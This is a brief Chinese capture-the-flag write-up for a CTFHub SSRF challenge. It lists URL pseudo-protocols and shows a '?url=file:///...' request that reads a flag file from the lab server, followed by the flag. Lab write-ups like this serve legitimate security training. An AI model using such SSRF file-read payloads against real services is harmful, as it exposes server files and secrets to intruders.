当前位置: 首页 > news >正文

CTFHub-SSRF-读取伪协议

news 2025/9/10 0:13:41

WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点-CSDN博客

伪协议有:      

 file:/// — 访问本地文件系统

 http:/// — 访问 HTTP(s) 网址

 ftp:/// — 访问 FTP(s) URLs

 php:/// — 访问各个输入/输出流(I/O streams)

 dict:///

sftp:///

ldap:///

tftp:///

gopher:///

根据提示挨个尝试用伪协议读取文件:

file:///var/www//html//flag.php

http://challenge-4b3f050a714db9d5.sandbox.ctfhub.com:10800/?url=file:///var/www//html//flag.php

F12

ctfhub{e5dda48e5ba656f0f6a43d18}

http://www.lryc.cn/news/207507.html

相关文章:

  • 推荐一款适合科技行业的CRM系统
  • ChatGPT 与 Python Echarts 完成热力图实例
  • vue3项目报错The template root requires exactly one element.eslint-plugin-vue
  • 【C++系列】STL容器——vector类的例题应用(12)
  • 常用应用安装教程---在centos7系统上安装JDK8
  • 阿里云/腾讯云国际站代理:国际腾讯云的优势
  • 【软件教程】如何用C++检查TCP或UDP端口是否被占用
  • Flutter报错RenderBox was not laid out: RenderRepaintBoundary的解决方法
  • 0基础学习PyFlink——用户自定义函数之UDAF
  • MVC架构_Qt自己的MV架构
  • CentOS - 安装 Elasticsearch
  • IDEA 断点高阶
  • Qt中的单例模式
  • ROS自学笔记十五:URDF工具
  • Pytorch代码入门学习之分类任务(三):定义损失函数与优化器
  • 【Linux】安装VMWare虚拟机(安装配置)和配置Windows Server 2012 R2(安装配置连接vm虚拟机)以及环境配置
  • Python入口顶部人体检测统计进出人数
  • 移动端自动化-Appium元素定位
  • menuconfig 图形化配置原理说明三
  • Ansible简介
  • Tomcat+nginx负载均衡和动静分离
  • 全景环视AVM标定
  • 【JavaScript】leetcode链表相关题解
  • 洞察运营机会的数据分析利器
  • 使用Python实现文字的声音播放
  • gulp自动化构建
  • java时间解析生成定时Cron表达式工具类
  • JavaEE 网络原理——TCP的工作机制(末篇 其余TCP特点)
  • 【软件测试】了解JUnit单元测试框架常用注解
  • 【广州华锐互动】三维全景3D消防科普展馆